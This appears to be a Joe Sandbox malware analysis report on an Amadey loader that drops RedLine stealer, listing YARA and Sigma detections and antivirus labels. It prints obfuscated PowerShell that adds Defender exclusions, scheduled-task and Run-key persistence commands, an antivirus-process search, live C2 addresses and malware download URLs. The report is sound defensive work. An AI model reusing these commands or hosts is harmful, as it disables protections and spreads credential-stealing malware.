16.2.PfOHmro.exe.41b4170.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ee:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cf:$v2_6: GetUpdates
16.2.PfOHmro.exe.4199550.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.PfOHmro.exe.4199550.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.PfOHmro.exe.4199550.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x2e1ea:$a4: get_ScannedWallets 0x2d048:$a5: get_ScanTelegram 0x2de6e:$a6: get_ScanGeckoBrowsersPaths 0x2bc8a:$a7: <Processes>k__BackingField 0x29b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x2b5be:$a9: <ScanFTP>k__BackingField
16.2.PfOHmro.exe.4199550.1.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x2c5eb:$gen01: ChromeGetRoamingName 0x2c61f:$gen02: ChromeGetLocalName 0x2c648:$gen03: get_UserDomainName 0x2e887:$gen04: get_encrypted_key 0x2de03:$gen05: browserPaths 0x2e14b:$gen06: GetBrowsers 0x2da81:$gen07: get_InstalledInputLanguages 0x2b26f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x23358:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x23d38:$spe6: windows-1251, CommandLine: 0x2efe1:$spe9: wallet 0x29a2c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0x29b27:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x29e84:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x29f91:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x2a110:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0x29ab8:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x29ae1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x29c7f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x29fba:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0x2a059:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
16.2.PfOHmro.exe.4199550.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x2b0aa:$u7: RunPE 0x2e761:$u8: DownloadAndEx 0x23d50:$pat14: , CommandLine: 0x2dc99:$v2_1: ListOfProcesses 0x2b2ab:$v2_2: get_ScanVPN 0x2b34e:$v2_2: get_ScanFTP 0x2c03e:$v2_2: get_ScanDiscord 0x2d02c:$v2_2: get_ScanSteam 0x2d048:$v2_2: get_ScanTelegram 0x2d0ee:$v2_2: get_ScanScreen 0x2de36:$v2_2: get_ScanChromeBrowsersPaths 0x2de6e:$v2_2: get_ScanGeckoBrowsersPaths 0x2e129:$v2_2: get_ScanBrowsers 0x2e1ea:$v2_2: get_ScannedWallets 0x2e210:$v2_2: get_ScanWallets 0x2e230:$v2_3: GetArguments 0x2c8f9:$v2_4: VerifyUpdate 0x3120e:$v2_4: VerifyUpdate 0x2e5ea:$v2_5: VerifyScanRequest 0x2dce6:$v2_6: GetUpdates 0x311ef:$v2_6: GetUpdates
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\10141650101\61c1a86413.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 8120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\61c1a86413.exe

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\10141520101\mIrI3a9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe, ParentProcessId: 2020, ParentProcessName: mIrI3a9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , ProcessId: 6000, ProcessName: powershell.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5296, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, ProcessId: 7684, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", ProcessId: 3272, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\10141520101\mIrI3a9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe, ParentProcessId: 2020, ParentProcessName: mIrI3a9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , ProcessId: 6000, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\10141650101\61c1a86413.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 8120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\61c1a86413.exe

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe, ProcessId: 2020, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zdeovab.1nx.ps1

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 5820, ParentProcessName: random.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe" , ProcessId: 2280, ProcessName: rapes.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", ProcessId: 3272, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\10141520101\mIrI3a9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe, ParentProcessId: 2020, ParentProcessName: mIrI3a9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" , ProcessId: 6000, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 336, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 568, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 7868, ProcessName: findstr.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: random.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://176.113.115.7/files/5526411762/CgmaT61.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7821444099/mIrI3a9.exe	Avira URL Cloud: Label: malware
Source: https://authenticatior.com/vrep.msi	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/off/random.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7834629666/v6Oqdnc.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/test/exe/random.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/6142491850/FvbuInU.exe	Avira URL Cloud: Label: malware
Source: http://verifycleansecurity.com/static/Qbffmsv.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7868598855/zY9sqWs.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/teamex_support/random.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7834629666/v6Oqdnc.exe;	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/5526411762/yUI6F6C.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/well/random.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/martin2/random.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7212159662/HmngBpR.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\zY9sqWs[1].exe	Avira: detection malicious, Label: TR/AVI.Amadey.itpsl
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Avira: detection malicious, Label: TR/AD.RedLineSteal.wcbyn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\PfOHmro[1].exe	Avira: detection malicious, Label: TR/AD.RedLineSteal.wcbyn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yUI6F6C[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\CgmaT61[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe	Avira: detection malicious, Label: TR/AD.Nekark.ccjuh
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\V0Bt74c[1].exe	Avira: detection malicious, Label: TR/AD.Nekark.qnifa
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\FvbuInU[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[3].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	Avira: detection malicious, Label: TR/AD.PSLoader.wdbmn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\v6Oqdnc[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[3].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: 19.2.PfOHmro.exe.400000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["101.99.92.190:40919"], "Bot Id": "Build 7"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ADFoyxP[1].exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ReK7Ewx[1].exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[3].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mIrI3a9[1].exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yUI6F6C[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\PfOHmro[1].exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\v6Oqdnc[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\zY9sqWs[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\CgmaT61[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\FvbuInU[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\V0Bt74c[1].exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[2].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\10141530101\FvbuInU.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\10141540101\v6Oqdnc.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\10141560101\PfOHmro.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\10141590101\CgmaT61.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\10141600101\zY9sqWs.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\10141610101\ADFoyxP.exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\10141620101\yUI6F6C.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\10141630101\V0Bt74c.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\10141640101\ReK7Ewx.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\10141650101\61c1a86413.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\10141660101\afdbfd8fdc.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\10141700101\b794b2f69e.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\10141720101\a2528907a0.exe	ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: random.exe	Virustotal: Detection: 62%			Perma Link
Source: random.exe	ReversingLabs: Detection: 60%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 176.113.115.6
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: /Ni9kiput/index.php
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: S-%lu-
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: bb556cff4a
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rapes.exe
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Startup
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rundll32
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Programs
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: %USERPROFILE%
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cred.dll
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: clip.dll
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: http://
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: https://
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: /quiet
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: /Plugins/
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: &unit=
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: shell32.dll
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: kernel32.dll
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ProgramData\
Source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp	String decryptor: AVAST Software
